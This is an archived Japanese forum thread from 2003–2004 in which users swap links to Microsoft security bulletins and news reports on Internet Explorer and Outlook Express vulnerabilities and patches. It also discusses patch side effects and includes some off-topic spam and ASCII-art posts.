追加です。
アプリとしては上記のほか、
SpywareBlaster(スパイウエアブラスター)でオールチェック
Spybot(スパイボット)で免疫化適用
AdAware(アドアウエア)で定期チェック です。
よろしくお願いします。

561 :名無しさん@お腹いっぱい。:03/07/04 18:15
>>558
HTMLプレビューを許可した状態なら起きるというので、わざと切り替えない限りはOEよりは可能性は低い。

562 :名無しさん@お腹いっぱい。:03/07/04 19:30

(;´Д`)

563 :名無しさん@お腹いっぱい。:03/07/04 22:28
>>559
最適化中に送受信が入るとそのメッセージが出る。

564 :名無しさん@お腹いっぱい。:03/07/05 00:11
>>561
OEはだいぶ前に対策済みでプレビュー許可しても発生しませんが、何か?
OEが塞いだ後も指摘されるまで放置してたという事は、OEが塞いだ他の穴も
放置されてる可能性が高いという事ですな。

565 :559:03/07/05 15:37
>>563
やはりそうですか。そんな感じはしていました。
受信は当時1分間隔でチェックに設定していました。
それにしても、受信を完了させた直後でも上記の現象が出ていました。
現在はなぜか治りましたが、未知のスパイかウイルスかその類を
知らずに飼育していたのかもしれないと思って、
気持ち悪くて質問しました。検索はかなりしました。
現象が再発したらまたお尋ねしたく思います。

566 :名無しさん@お腹いっぱい。:03/07/05 18:54
>>556

おお、ありがとう。
私は普段はセキュリティ板しか見ていないので、、(反省)。
亀レスになってしまいました(汗)。

567 :名無しさん@お腹いっぱい。:03/07/08 00:33
>>557対応状況
Winbiffユーザーの皆様へ重要なお知らせ
http://www.orangesoft.co.jp/Winbiff20/secholl_20030317.html
ドラえもんメールアップデートモジュール公開のお知らせ
http://www.doraemon-mail.com/support/update.html
WeMail32 Ver.2.10beta1をリリースしました
http://www.ntes.co.jp/WeMail/whatsnew.html
EdMax更新履歴
http://www.edcom.jp/edmdes1.html
EdMaxフリー版更新履歴
http://www.edcom.jp/edmfree.html

568 :名無しさん@お腹いっぱい。:03/07/08 00:57
問題点は、OEは対策されるまで公表されない場合が多い。
他のメーラはOEで公表後、後追いでの対策になる。

569 :名無しさん@お腹いっぱい。:03/07/08 10:03
> OEは対策されるまで公表されない場合が多い。
あたりまえだろ、対策前に公表されたらアタックされるぞ

570 :名無しさん@お腹いっぱい。:03/07/08 10:05
まぁ、公表されても見ないあほが多いけどな。

571 :名無しさん@お腹いっぱい。:03/07/08 11:44
[Full-Disclosure] Internet Explorer 6 DoS Bug
http://lists.netsys.com/pipermail/full-disclosure/2003-July/010964.html
ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/2003/07.html#20030708_aux

572 :名無しさん@お腹いっぱい。:03/07/08 13:47
>>571
Windows ME + IE 6 SP1でも、アドレスバーに c:\aux と入力して
enter すると IE 6 SP1がフリーズした。

573 :(;´Д`):03/07/08 14:33
(;´Д`)感動した
http://homepage3.nifty.com/coco-nut/

574 :名無しさん@お腹いっぱい。:03/07/08 21:49
>>571-572
Internet Explorer 6が「c:\aux」でフリーズするバグ
http://www.zdnet.co.jp/enterprise/0307/08/epn16.html

575 :名無しさん@お腹いっぱい。:03/07/10 15:52
Windowsに3種類の深刻なセキュリティ・ホール,すべてのユーザーが対策を
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030710/3/

(1)HTML コンバータのバッファ オーバーランにより,コードが実行される(823559)(MS03-023)
(2)Windows のバッファ オーバーランによりデータが破損する(817606)(MS03-024)
(3)ユーティリティ マネージャによる Windows メッセージ処理の問題により,権限が昇格する(822679)(MS03-025)

576 :_:03/07/10 16:29
http://homepage.mac.com/hiroyuki44/

577 :あい:03/07/10 20:31
みてね! 
http://akipon.free-city.net/page003.html

578 :名無しさん@お腹いっぱい。:03/07/10 23:57
>>575
不具合報告あり。
windows updateしたときに上げるスレ 6
http://pc2.2ch.net/test/read.cgi/win/1057833448/l50

579 :名無しさん@お腹いっぱい。:03/07/11 15:12
WebブラウザOperaにサービス拒否攻撃を受ける新しい弱点
http://itpro.nikkeibp.co.jp/free/NT/WinSecurity/20030710/1/

580 :名無しさん@お腹いっぱい。:03/07/11 16:28
>>579
関係ないだろ、スレのタイトル読めない?

581 :名無しさん@お腹いっぱい。:03/07/11 21:10
>580
脳みそがクラックされてるから仕方ない

582 :名無しさん@お腹いっぱい。:03/07/11 21:35
HTML コンバータのバッファ オーバーランにより、コードが実行される
http://www.microsoft.com/japan/technet/security/bulletin/MS03-023.asp
厳密にはIEやOEのセキュリティホールではないが、
喰らうタイミングがIEでWebページを見たときやOEでHTMLメールを
開いたときだから貼っとく。

583 :名無しさん@お腹いっぱい。:03/07/12 17:41
>>579-581
IE/OEの代替でOpera勧める人がいるから、貼っといても無駄ではないと思う。

584 :名無しさん@お腹いっぱい。:03/07/13 00:36
>>582はたぶんalign buffer overflowの修正だ。
http://www.pivx.com/larholm/unpatched/
「スクリプトによる貼り付け処理」を無効にすることで回避できるって書いてるし

585 :名無しさん@お腹いっぱい。:03/07/14 00:51
>>583
だったらOperaのスレでやってくれ。
ここはIE/OE使う人のためのスレ。

586 :山崎 渉:03/07/15 11:07

 __∧_∧_
 |(  ^^ )| <寝るぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         山崎渉
   ~ ̄ ̄ ̄ ̄

587 :名無しさん@お腹いっぱい。:03/07/15 15:29
保守

588 :名無しさん@お腹いっぱい。:03/07/15 17:02
>>585
IE/OE使う人だけのためのスレじゃなくて、
より安全なブラウザ・メーラを建設的に話すスレ>>1でもあったんじゃない?
IE/OEの話題がメインだとしても。

589 :名無しさん@お腹いっぱい。:03/07/15 17:10
1 July 2003: There are currently 19 unpatched vulnerabilities.
http://www.pivx.com/larholm/unpatched/

590 :名無しさん@お腹いっぱい。:03/07/15 17:12
↑Unpatched IE security holes

591 :名無しさん@お腹いっぱい。:03/07/15 21:04
>>588
IEコンポーネントの話ならともかく
Opera自体については完全にスレ違い。
そういったことはOperaのスレッドでどうぞ。

592 :1:03/07/15 23:36
いつのまに"IE/OE使う人のためのスレ"になったんだ…

593 :名無しさん@お腹いっぱい。:03/07/15 23:39
>>592
Operaの話題はOperaのスレでやれってことでしょ?
それとスレは君の私有物ではないよ

594 :名無しさん@お腹いっぱい。:03/07/16 00:08
セキュリティパッチ情報集積所でも立てるか

595 :名無しさん@お腹いっぱい。:03/07/16 23:43
漏れも全部一緒のほうがありがたい

596 :名無しさん@お腹いっぱい。:03/07/18 14:30
http://www.microsoft.com/japan/technet/security/fixedhome.asp
しかし、わかりにくいところにあるなw

597 :名無しさん@お腹いっぱい。:03/07/24 18:47

「MS03-030: DirectX の未チェックのバッファにより、コンピュータが侵害される(819696)」
http://www.microsoft.com/japan/technet/security/bulletin/MS03-030ov.asp

598 :???:03/07/24 18:48

期間限定!もうお目にかかれない!

http://alink3.uic.to/user/angeler.html

599 :名無しさん@お腹いっぱい。:03/07/31 17:06
http://altba.com/bakera/hatomaru.aspx/ebi/genre/00490045
>XML の CDATA 区間の中に object を書かれると、何故か「マイコンピュータ」ゾーンの
>セキュリティレベルで実行されてしまうようです
http://www.st.ryukoku.ac.jp/~kjm/security/memo/2002/03.html#20020301_ie

これってもう対策されたんだっけ?

600 :名無しさん@お腹いっぱい。:03/07/31 20:53
600げっっとーーーーーおぉ!!

601 :ぼるじょあ ◆yBEncckFOU :03/08/02 04:50
     ∧_∧  ∧_∧
ピュ.ー (  ・3・) (  ^^ ) <これからも僕たちを応援して下さいね(^^)。
  =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
  = ◎――――――◎                      山崎渉&ぼるじょあ

602 :名無しさん@お腹いっぱい。:03/08/03 01:34
hage

603 :名無しさん@お腹いっぱい。:03/08/05 17:03
>>599
とっくに対策されてるがそこに書かれている対処自体は
実行したほうがいい。
面倒ならWindows Update以外は常に制限ユーザーでIEを使え

604 :名無しさん@お腹いっぱい。:03/08/13 14:14
いろいろ読ませてもらったけど、つまるところ
OEであれIEコンポーネント使用メーラーであれ、
IEと連携しないように、すべてのメッセージをテキスト形式で受信すれば
何ら問題ないわけですね。


605 :名無しさん@お腹いっぱい。:03/08/13 15:17
>>604
違う。セキュリティホールを考慮してない。

606 :名無しさん@お腹いっぱい。:03/08/15 11:21
すべてテキスト形式で受信するなら
IEコンポーネントいらないじゃん

607 :名無しさん@お腹いっぱい。:03/08/15 20:12
OEの開発、提供停止
http://www.zdnet.com.au/newstech/ebusiness/story/0,2000048590,20277192,00.htm

608 :名無しさん@お腹いっぱい。:03/08/15 20:34
>>607
メーラー作者は(゚д゚)ウマーか

609 :山崎 渉:03/08/15 22:26
    (⌒V⌒)
   │ ^ ^ │<これからも僕を応援して下さいね(^^)。
  ⊂|    |つ
   (_)(_)                      山崎パン

610 :ぼるじょあ ◆yBEncckFOU :03/08/17 22:27
(・3・) エェー

611 :名無しさん@お腹いっぱい。:03/08/21 14:08
IEに「緊急」の脆弱性、累積パッチリリース

http://www.zdnet.co.jp/enterprise/0308/21/epn02.html

612 :名無しさん@お腹いっぱい。:03/09/06 01:28
Windows XP Service Pack 1 適用のお願い
- Windows XP 初期出荷版(SP1 未適用製品)向け修正プ ログラム提供終了のお知らせ
更新日: 2003 年 9 月 5 日
http://www.microsoft.com/japan/windowsxp/endofgold.asp

613 :名無しさん@お腹いっぱい。:03/09/11 10:19
○「MS03-039: RPCSS サービスのバッファ オーバーランによりコードが実行され
る (824146)」
http://www.microsoft.com/japan/technet/security/bulletin/MS03-039ov.asp

○Internet Explorer 用の累積的な修正プログラム (822925) (MS03-032)
http://www.microsoft.com/japan/technet/security/bulletin/ms03-032.asp
今回の更新内容
このセキュリティ情報ページを更新し、このセキュリティ情報で提供された
修正プログラムが 「オブジェクト タグの脆弱性」 (CAN-2003-0532) を適切に
修正しないという報告についての情報を追加しました。

○Windows カーネル メッセージ処理のバッファ オーバーランにより、
権限が昇格する (811493) (MS03-013)
http://www.microsoft.com/japan/technet/security/bulletin/ms03-013.asp

○RPC インターフェイスのバッファ オーバーランによりコードが実行される
(823980) (MS03-026)
http://www.microsoft.com/japan/technet/security/bulletin/ms03-026.asp

614 :名無しさん@お腹いっぱい。:03/09/11 13:34
IEのパッチに問題発覚,適用しても解消で きないセキュリティ・ホールが存在
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030909/1/

Windowsにまたもや“超特大”のセキュリ ティ・ホール,すぐにWindows Updateの実施を
第2,第3の「Blaster」ワームが出現する恐れあり
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030911/1/

615 :名無しさん@お腹いっぱい。:03/09/13 21:57
致命的な奴が8つも追加…
http://www.pivx.com/larholm/unpatched/

616 :名無しさん@お腹いっぱい。:03/09/20 00:57
2年前の脆弱性を突いた新ウイルスが拡散
http://www.zdnet.co.jp/enterprise/0309/19/epn03.html

W32.Swen.A@mm
http://www.symantec.com/region/jp/sarcj/data/w/w32.swen.a@mm.html
WORM_SWEN.A
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SWEN.A&VSect=T
W32/Swen@MM
http://www.nai.com/japan/security/virS.asp?v=W32/Swen@MM

617 :名無しさん@お腹いっぱい。:03/10/04 19:10
MS03-040: Internet Explorer 用の累積的な修正プログラム (828750)
http://www.microsoft.com/japan/technet/security/bulletin/MS03-040ov.asp

618 :名無しさん@お腹いっぱい。:03/10/05 23:26
マイクロソフト、IE 5.01以後が対象の緊急の脆弱性「MS03-040」
http://internet.watch.impress.co.jp/cda/news/2003/10/04/654.html

米MS、とんだお粗末-重大な脆弱性用のパッチが役に立たず
http://japan.cnet.com/news/ent/story/0,2000047623,20060815,00.htm

619 :名無しさん@お腹いっぱい。:03/10/06 17:07
IEに危険なセキュリティ・ホール,
WebページやHTMLメールを見るだけで被害を受ける

今回の累積パッチでは,過去のパッチでふさげなかった
セキュリティ・ホールも修正

http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20031005/135316/

620 :名無しさん@お腹いっぱい。:03/10/17 09:20
後を絶たないIEのセキュリティ・ホール,設定変更などで“自衛”を
続々見つかるパッチの不具合,パッチ未公開のホールを狙うウイルスも
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20031014/1/

621 :名無しさん@お腹いっぱい。:03/10/29 12:01
「ネットにつなぐだけで攻撃を受ける」――第三の“超特大”セキュリティ・ホールを解説する
Exploitが既に公開,パッチを適用してもメッセンジャ サービスは無効に
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20031028/1/

IE/OEと関係ないのでsage

622 :名無しさん@お腹いっぱい。:03/11/08 06:27
IEを起動するとthesten.comという外国のアダルトサイトがホームページになっていて、
お気に入りに3つのそのサイトへのリンクが毎回入っています。
履歴やクッキーやゴミ箱の内容など全て消去しても絶対に起動したときに表示されます。

どのたか改善方法を教えてください。

623 :((((((;゚Д゚))))))ガクガクブルブル :03/11/08 08:10
http://pc2.2ch.net/test/read.cgi/pcqa/1067657959/

>>622
ここ逝こうね。
それと、ここで質問する前に、
最低限1から書かれているFAQとか読んで、
書かれていること実行してみて、だめだったら
質問したほうがいいよ。それと、これ、マルチじゃないよね

624 :名無しさん@お腹いっぱい。:03/11/12 02:57
Internet Explorer 用の累積的な修正プログラム (828750) (MS03-040)

最大深刻度 :緊急

影響を受けるソフトウェア :
Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 6
Microsoft Internet Explorer 6 for Windows Server 2003

http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms03-040.asp

625 :名無しさん@お腹いっぱい。:03/11/12 03:03
↑ミス
Internet Explorer 6 SP1 用の累積的な修正プログラム (KB824145)
が出ているので、各自WindowsUpdateされたし。
現時点ではTechNetに情報なし。


626 :SMTP信号機:03/11/12 03:06
サーバ関連情報レジストリがばれている限り貴方のPCに侵入した自己散布型ウイルスは自分を撒き散らします。
かといってOEの類を使うのを止めるのはしゃくですよね?
だから作りました。
貴方のPCが迷惑メール送信の加害者にならない為に・・・
http://homepage3.nifty.com/tokeon/Eng-B/SMTPmv.html
JavaですからLinuxPCでも動くには動きます。

627 :名無しさん@お腹いっぱい。:03/11/12 14:27
IEに「緊急」のセキュリティ・ホール,マイクロソフトは累積パッチを公開
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20031112/136355/

MS、WindowsとOfficeの脆弱性修正パッチリリース
http://www.zdnet.co.jp/enterprise/0311/12/epn05.html
米マイクロソフト、米祝日にセキュリティパッチをリリース
http://japan.cnet.com/news/ent/story/0,2000047623,20061917,00.htm

628 :名無しさん@お腹いっぱい。:03/11/12 14:30
MS03-048 - Internet Explorer 用の累積的なセキュリティ更新 (824145)
http://www.microsoft.com/japan/technet/security/bulletin/MS03-048.asp
●影響を受けるソフトウェア
・Microsoft Windows 98 Second Edition
・Microsoft Windows Millennium Edition
・Microsoft Windows NT Workstation 4.0
・Microsoft Windows NT Server 4.0
・Microsoft Windows NT Server 4.0, Terminal Server Edition
・Microsoft Windows 2000
・Microsoft Windows XP
・Microsoft Windows XP 64 bit Edition
・Microsoft Windows XP 64 bit Edition Version 2003
・Microsoft Windows Server 2003
・Microsoft Windows Server 2003 64 bit Edition
●影響
リモートからのコード実行

629 :名無しさん@お腹いっぱい。:03/11/12 14:40
>>1
選択肢

(1)Datula、Netscape7.1 Mail、Edmaxなどを使う


630 :名無しさん@お腹いっぱい。:03/11/12 14:57
部バージョンの「Eudora for Windows」にバッファオーバーフ
ローの脆弱性
http://www.zdnet.co.jp/enterprise/0311/12/epn06.html

631 :名無しさん@お腹いっぱい。:03/11/12 19:17
q824145.exe /q:a /r:n

これも出来たとはな (´ー`) フッ

632 :名無しさん@お腹いっぱい。:03/11/12 19:17
誤爆したぜ

633 :名無しさん@お腹いっぱい。:03/11/19 19:53
IEにパッチを当てるとスクロール操作に不具合,パッチの品質に改めて注意が必要
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20031118/1/

スクロールバーの空白部分をクリックすると画面スクロールが正しく行われない
http://support.microsoft.com/default.aspx?scid=kb;ja;832270

634 :名無しさん@お腹いっぱい。:03/11/29 20:24
IEに複数のセキュリティ・ホール,対策はアクティブスクリプトを無効にすること
ホールを突くデモ・ページが公開中,最新パッチを適用していても影響を受ける
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20031128/136983/

635 :名無しさん@お腹いっぱい。:03/11/30 01:40
Internet Explorer System Compromise Vulnerabilities
http://secunia.com/advisories/10289/
Internet Explorerの新セキュリティホールは「極めて危険」
http://www.zdnet.co.jp/enterprise/0311/26/epi02.html

Opera:特定のMIMEタイプを持つデータがユーザーに無許可でダウンロード・実行される問題
http://jp.opera.com/cgi-bin/supsearch2.cgi?options=index&name=j104

636 :名無しさん@お腹いっぱい。:03/11/30 01:57
最近のウイルス対策製品も IE の御世話になってるもの多い感じだけど
どうなの?


637 :名無しさん@お腹いっぱい。:03/11/30 03:25
> 最近のウイルス対策製品も IE の御世話になってるもの多い感じだけど
> どうなの?

まぁ、Windows自体に依存してるからね…。

WindowsがIEにも依存してるし。 <= help等

638 :636:03/11/30 03:44
>> 637

そうだねー。でも OS が web browser に依存しているというのは。
完全に逆なんじゃないのかなあ?

少なくともセキュリティー関連のものは独自の仕組で
アップデートとか出来た方が安心だと思うのは間違いだろうか。
だからといって完璧ではないだろうけど、若干ましな気がする。

639 :名無しさん@お腹いっぱい。:03/12/03 14:31
IEを使い続けるリスクを再認識しよう
パッチには複数の不具合,パッチ未公開のセキュリティ・ホールが続出
今週のSecurity Check [Windows編] (第108回,2003年12月3日)
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20031202/1/

640 :名無しさん@お腹いっぱい。:03/12/11 21:36
IEにURLを偽装できるパッチ未公開の脆弱性が発見される
〜緊急度が低いため、パッチはまだリリースしない(MS取締役東氏)
http://internet.watch.impress.co.jp/cda/news/2003/12/11/1451.html

641 :名無しさん@お腹いっぱい。:03/12/11 21:40
>>640
ちなみに、Opera7.23ja(3226)だとセキュリティ警告のダイアローグが出る。

642 :名無しさん@お腹いっぱい。:03/12/12 18:06
IEにURLを偽装できるセキュリティ・ホール,安易なクリックは禁物
セキュリティ・ホールを確認するWebページやHTMLメールが公開
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20031211/137400/

ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/2003/12.html#20031211_IE

643 :名無しさん@お腹いっぱい。:03/12/12 18:52
>>641
Opera6.06でも警告を確認。
これ、ある意味新ウイルスに使われそうなのに、マイクロソフトは危険度低なのね・・・

644 :こここ:03/12/13 21:38
JokeVirusってどうやって解除するんですか?

645 :名無しさん@お腹いっぱい。:03/12/20 03:18
@impoでcss読み込んじゃうなんて何考えてんだろうな

646 :名無しさん@お腹いっぱい。:03/12/26 06:41

こんにちは。MLM・NB初心者です。
詳しい方や現在もしくは過去MLM・NBをやられていた方の
ご意見が聞きたくてページ作りました。
よろしくお願いします。

つまらない物ですが、お礼の品も用意しておりますので
ぜひ、どうぞ!

   http://gonbea.fc2web.com/


647 :名無しさん@お腹いっぱい。:04/01/10 22:26
IEに2種類の新たなセキュリティ・ホールが見つかる
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040110/138152/

648 :名無しさん@お腹いっぱい。:04/01/14 23:22
月例パッチに含まれなかったIEの複数の脆弱性
http://www.itmedia.co.jp/enterprise/0401/14/epn15.html

649 :名無しさん@お腹いっぱい。:04/01/21 18:24
解消されない“URLの偽装問題”,1月もIEのパッチは公開されず
Mozillaは最新版で対応完了,MDACのセキュリティ・ホールにも注意
今週のSecurity Check [Windows編] (第110回,2004年1月21日)
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20040120/1/

650 :名無しさん@お腹いっぱい。:04/01/28 19:48
URL偽装にご注意を!―Symantecのウイルス研究者が警告
http://itpro.nikkeibp.co.jp/free/NBY/NEWS/20040128/138984/

651 :名無しさん@お腹いっぱい。:04/01/28 20:53
Microsoft plans to release a software update that modifies
the default behavior of Internet Explorer for handling user
information in HTTP and HTTPS URLs
http://support.microsoft.com/default.aspx?scid=kb;[LN];834489

652 :名無しさん@お腹いっぱい。:04/01/30 18:33
IEに,ダウンロードするファイル名を偽装されるセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040129/139103/

653 :名無しさん@お腹いっぱい。:04/02/01 15:55
>>652
もうなんでもありでつね

654 :名無しさん@お腹いっぱい。:04/02/02 00:38
IEもうだめぽ

655 :名無しさん@お腹いっぱい。:04/02/03 04:14
レベル緊急。

MS04-004 - Internet Explorer 用の累積的なセキュリティ修正プログラム (832894)


656 :名無しさん@お腹いっぱい。:04/02/03 10:05
Internet Explorer 用の累積的なセキュリティ修正プログラム (832894) (MS04-004)
http://www.microsoft.com/japan/technet/security/bulletin/ms04-004.asp
2004 年 2 月のセキュリティ情報 (Windows)
http://www.microsoft.com/japan/technet/security/bulletin/winfeb04.asp

657 :名無しさん@お腹いっぱい。:04/02/03 10:08
>>656
影響を受けるソフトウェア :
Microsoft Windows NTR Workstation 4.0 Service Pack 6a
Microsoft Windows NT Server 4.0 Service Pack 6a
Microsoft Windows NT Server 4.0 Terminal Server Edition, Service Pack 6
Microsoft Windows 2000 Service Pack 2, Service Pack 3, Service Pack 4
Microsoft Windows XP, Microsoft Windows XP Service Pack 1
Microsoft Windows XP 64-Bit Edition, Microsoft Windows XP 64-Bit Edition Service Pack 1
Microsoft Windows XP 64-Bit Edition Version 2003
Microsoft Windows ServerR 2003
Microsoft Windows Server 2003, 64-Bit Edition

テストした Microsoft Windows および Officeコンポーネント :
Internet Explorer 6 Service Pack 1
Internet Explorer 6 Service Pack 1 (64-Bit Edition)
Internet Explorer 6 Service Pack 1 for Windows Server 2003
Internet Explorer 6 Service Pack 1 for Windows Server 2003 (64-Bit Edition)
Internet Explorer 6
Internet Explorer 5.5 Service Pack 2
Internet Explorer 5.01 Service Pack 4

658 :名無しさん@お腹いっぱい。:04/02/03 10:17
>>657
Windows 98(SE),Windows Meがないのは、影響がないのではなくて、
サポート終了に伴い評価の対象外になったため。
http://www.microsoft.com/japan/win98/98meExtend.htm
http://www.microsoft.com/japan/win98/98meextendfaq.htm
(有償サポート契約を結んでいない一般ユーザは、
 03年12月31日で98/Meのサポートは終了。)

659 :名無しさん@お腹いっぱい。:04/02/03 11:11
>>658
>>657には98SE,MEはあがってないけど、個別のパッチのところには
98SE、MEもあがっていて適用可能だね。
http://www.microsoft.com/downloads/details.aspx?FamilyId=70530968-B59A-47C0-90D3-0C884910BC97&displaylang=ja
>システム要件
>サポートされているオペレーティング システム : Windows 2000 Service Pack 2, Windows 2000 Service Pack 3,
>Windows 2000 Service Pack 4, Windows 98, Windows 98 Second Edition, Windows ME, Windows NT, Windows XP
>この修正プログラムは、次のオペレーティング システム用の Internet Explorer に対して適用されます。
>Windows XP SP1
>Windows XP
>Windows Millennium Edition (Windows Me)
>Windows 2000 SP2
>Windows 2000 SP3
>Windows 2000 SP4
>Windows 98 SE
>Windows NT 4.0 SP6A

660 :名無しさん@お腹いっぱい。:04/02/03 22:33
今回のパッチは良く考えてからインスコした方が良さげ
スクロールはかちゅにも影響してるので直したいのだがw

661 :名無しさん@お腹いっぱい。:04/02/03 23:34
IE 6の最新パッチにトラブル,記憶させたパスワードが表示されなくなる
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040203/139279/
MS04-004 Internet Explorer 6 Service Pack 1 用セキュリティ問題の累積的な修正プログラム
(KB832894)の適用後、記憶したはずのユーザー名とパスワードが表示されなくなる
ttp://support.microsoft.com/default.aspx?scid=http://www.microsoft.com/japan/support/sokuho/default.asp#Record_94

マイクロソフト,IEのセキュリティ・パッチを緊急リリース
URLの“偽装問題”を含む,3種類のセキュリティ・ホールを解消
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040203/139235/
MS、IEの脆弱性に対応の臨時パッチ
http://www.itmedia.co.jp/enterprise/0402/03/epc03.html
IE用の新パッチ発行で電子商取引に混乱の可能性も
http://www.itmedia.co.jp/enterprise/0402/02/epic01.html

662 :名無しさん@お腹いっぱい。:04/02/04 01:59
そもそもブラウザに記録させるようなPASSに、
PASSの意味はあるのかあと小一時間は問い詰めない。

663 :名無しさん@お腹いっぱい。:04/02/04 02:13
>>662ワラタ。

664 :名無しさん@お腹いっぱい。:04/02/05 21:56


665 :名無しさん@お腹いっぱい。:04/02/05 22:40
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice


666 :名無しさん@お腹いっぱい。:04/02/09 00:42
↓IEの脆弱の部分 下記のソフトで補うことが出来るんだろうか?
このソフト使っている人いたら 教えてね

BB de!!スマートブラウジング Ver.1 

667 :名無しさん@お腹いっぱい。:04/02/11 21:07
Opinion:IE臨時パッチをめぐる混乱はなぜ起きたのか
http://www.itmedia.co.jp/enterprise/0402/10/epc17.html

668 :名無しさん@お腹いっぱい。:04/02/18 11:27
漏えいしたWindowsのソースコードから早くもIE 5の脆弱性が発見される
〜リモートから任意のコードを実行可能。IE 6は影響なし
http://internet.watch.impress.co.jp/cda/news/2004/02/17/2118.html
マイクロソフト、複数の脆弱性を攻撃する手口が公開されていると警告
http://internet.watch.impress.co.jp/cda/news/2004/02/17/2125.html

669 :名無しさん@お腹いっぱい。:04/02/18 11:34
流出したWindowsのソース・コードでIE 5のセキュリティ・ホールが見つかる
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040217/139945/
攻撃コードが既に出現,Windowsの“超特大”級セキュリティ・ホールを解説する
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20040217/1/

670 :名無しさん@お腹いっぱい。:04/02/18 16:13
ソースコード流出がきっかけで指摘された新たなIEの脆弱性、その影響は?
Windows 2000とWindows NT 4のソースコードの一部がインターネットに流出したことが
明らかになってからわずか2日後、そのコードを元に、Internet Explorerの新たな脆弱
性が指摘された。
http://www.itmedia.co.jp/enterprise/0402/18/epn03.html

671 :名無しさん@お腹いっぱい。:04/02/20 20:01
IEにパッチ未公開のセキュリティ・ホール,攻撃コードも出現している
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040220/140200/

672 :名無しさん@お腹いっぱい。:04/03/01 16:45
IEのフレーム悪用でパスワード漏れ――iDEFENSEが警告
http://www.itmedia.co.jp/enterprise/0403/01/epic01.html

673 :名無しさん@お腹いっぱい。:04/03/04 22:01
Windows XP Service Pack 2ベータ版プレビュー(パート2)後編
「Security Center」,IE,OEのセキュリティ機能
http://itpro.nikkeibp.co.jp/members/NT/WinNext/20040302/2/

674 :名無しさん@お腹いっぱい。:04/03/04 22:06
>673
>Outlook ExpressはHTMLメールから身を守れる
> MicrosoftはOutlook 2003において,HTML形式の電子メール内にある画像
>をブロックし,危険な可能性のある電子メールの添付物(例えば.exeという拡張
>子のファイル)を隔離するという,非常にニーズの高い安全対策を導入した。
>同社はXP SP2でこの機能をOutlook Expressに追加しようとしている。

675 :名無しさん@お腹いっぱい。:04/03/04 22:10
>>673
>ブラウザのアドオン管理はよくできている
> XP SP2のIEに追加される機能として,「Add-on Management」ツー
>ルがある。これはあなたがプラグインやツールバー,そのほかのご自
>分のシステムにインストールしたIEのアドオンを,リストの形で表示
>させたり,管理したりするのを手助けする。Add-on Managementツー
>ルは,私が知っているところでは,2つの基本機能を備えている。…

>IEの設定はスクリプトによる変更が不可に
> さて,IEに対するセキュリティ面の変更はこれだけに終わらない。
>XP SP2では,IEのウインドウに対してスクリプトによって設定変更を
>加えるのを防げる。

676 :名無しさん@お腹いっぱい。:04/03/12 17:10
 

202 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)